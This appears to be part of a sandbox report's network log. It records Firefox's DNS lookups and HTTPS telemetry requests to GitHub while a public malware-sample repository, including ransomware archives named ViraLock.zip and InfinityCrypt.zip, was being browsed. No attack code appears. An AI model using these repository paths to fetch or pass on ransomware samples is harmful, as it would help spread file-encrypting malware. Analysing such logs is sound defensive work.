                          host: private-user-images.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          x-amz-replication-status: COMPLETED
                          last-modified: Wed, 31 Jul 2024 12:12:48 GMT
                          etag: "99f7b59bb69d6870454d0e3b02b058fc"
                          cache-control: max-age=2592000
                          x-amz-version-id: null
                          content-type: image/png
                          accept-ranges: bytes
                          age: 1094178
                          date: Mon, 27 Jan 2025 17:28:07 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998888.818724,VS0,VE1
                          content-security-policy: default-src 'none'; script-src 'none'; img-src 'self'; media-src 'self'; sandbox;
                          x-fastly-request-id: 6ec233f275d61212a6f8e031b4d1ee4158f891db
                          server: GitHub.Cloud
                          strict-transport-security: max-age=31536000; includeSubDomains
                          x-content-type-options: nosniff
                          timing-allow-origin: https://github.com
                          content-length: 109112
                        • flag-us
                          DNS
                          avatars.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          avatars.githubusercontent.com
                          IN A
                          Response
                          avatars.githubusercontent.com
                          IN A
                          185.199.108.133
                          avatars.githubusercontent.com
                          IN A
                          185.199.110.133
                          avatars.githubusercontent.com
                          IN A
                          185.199.111.133
                          avatars.githubusercontent.com
                          IN A
                          185.199.109.133
                        • flag-us
                          DNS
                          avatars.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          avatars.githubusercontent.com
                          IN AAAA
                          Response
                          avatars.githubusercontent.com
                          IN AAAA
                          2606:50c0:8003::154
                          avatars.githubusercontent.com
                          IN AAAA
                          2606:50c0:8001::154
                          avatars.githubusercontent.com
                          IN AAAA
                          2606:50c0:8002::154
                          avatars.githubusercontent.com
                          IN AAAA
                          2606:50c0:8000::154
                        • flag-us
                          DNS
                          64.251.11.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          64.251.11.52.in-addr.arpa
                          IN PTR
                          Response
                          64.251.11.52.in-addr.arpa
                          IN PTR
                          ec2-52-11-251-64 us-west-2compute amazonawscom
                        • flag-us
                          DNS
                          154.110.199.185.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          154.110.199.185.in-addr.arpa
                          IN PTR
                          Response
                          154.110.199.185.in-addr.arpa
                          IN PTR
                          cdn-185-199-110-154githubcom
                        • flag-us
                          DNS
                          133.108.199.185.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          133.108.199.185.in-addr.arpa
                          IN PTR
                          Response
                          133.108.199.185.in-addr.arpa
                          IN PTR
                          cdn-185-199-108-133githubcom
                        • flag-us
                          DNS
                          68.159.190.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          68.159.190.20.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          private-user-images.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          private-user-images.githubusercontent.com
                          IN A
                          Response
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.109.133
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.110.133
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.111.133
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.108.133
                        • flag-us
                          DNS
                          private-user-images.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          private-user-images.githubusercontent.com
                          IN A
                          Response
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.109.133
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.110.133
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.111.133
                          private-user-images.githubusercontent.com
                          IN A
                          185.199.108.133
                        • flag-us
                          DNS
                          private-user-images.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          private-user-images.githubusercontent.com
                          IN A
                        • flag-us
                          DNS
                          184.115.23.2.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          184.115.23.2.in-addr.arpa
                          IN PTR
                          Response
                          184.115.23.2.in-addr.arpa
                          IN PTR
                          a2-23-115-184deploystaticakamaitechnologiescom
                        • flag-us
                          DNS
                          133.109.199.185.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          133.109.199.185.in-addr.arpa
                          IN PTR
                          Response
                          133.109.199.185.in-addr.arpa
                          IN PTR
                          cdn-185-199-109-133githubcom
                        • flag-us
                          DNS
                          collector.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          collector.github.com
                          IN A
                          Response
                          collector.github.com
                          IN CNAME
                          glb-db52c2cf8be544.github.com
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.113.21
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: text/plain;charset=UTF-8
                          content-length: 966
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.003042
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4A2EB0:58F599:6797C1BE
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: text/plain;charset=UTF-8
                          content-length: 1246
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.004351
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4A2EB0:58F59A:6797C1BE
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: text/plain;charset=UTF-8
                          content-length: 1509
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:26:31 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.003344
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4A3F98:590ABC:6797C1BE
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: text/plain;charset=UTF-8
                          content-length: 1044
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.004646
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4A6331:5936A1:6797C1C7
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 1087
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:26:57 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.002492
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4A77E0:594FAC:6797C1D7
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 1094
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:26:57 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.004235
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4A77E1:594FAD:6797C1E1
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 1498
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:26:57 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.002186
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4A77F6:594FC9:6797C1E1
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          content-type: text/plain;charset=UTF-8
                          content-length: 1075
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.002878
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4B1656:5A1064:6797C1E1
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          content-type: text/plain;charset=UTF-8
                          content-length: 1460
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.002430
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4B16E4:5A110F:6797C228
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 1113
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:29:25 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.003202
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4BC7AE:5AE76B:6797C228
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 1093
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:29:34 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.002287
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4BDBC6:5AFFF5:6797C275
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 1104
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:29:34 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.002304
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4BDBC9:5AFFF9:6797C27E
                        • flag-us
                          POST
                          https://collector.github.com/github/collect
                          firefox.exe
                          Remote address:
                          140.82.113.21:443
                          Request
                          POST /github/collect HTTP/2.0
                          host: collector.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 1513
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 204
                          date: Mon, 27 Jan 2025 17:29:34 GMT
                          access-control-allow-methods: POST,OPTIONS
                          access-control-allow-headers: Content-Type
                          access-control-allow-credentials: true
                          access-control-allow-origin: *
                          cache-control: no-cache
                          x-runtime: 0.001623
                          strict-transport-security: max-age=631138519
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1; mode=block
                          x-download-options: noopen
                          x-permitted-cross-domain-policies: none
                          x-github-backend: Kubernetes
                          x-github-request-id: C3E8:3B5A99:4BDBD7:5B0010:6797C27E
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN A
                          Response
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.114.21
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          private-user-images.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          private-user-images.githubusercontent.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN A
                          Response
                          api.github.com
                          IN A
                          20.26.156.210
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: text/plain;charset=UTF-8
                          content-length: 815
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002382
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C3F6:168503:E2FDD:114884:6797C1BE
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: text/plain;charset=UTF-8
                          content-length: 280
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:26:30 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002390
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C3F6:168503:E32C8:114C31:6797C1BE
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: text/plain;charset=UTF-8
                          content-length: 490
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:26:48 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002408
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
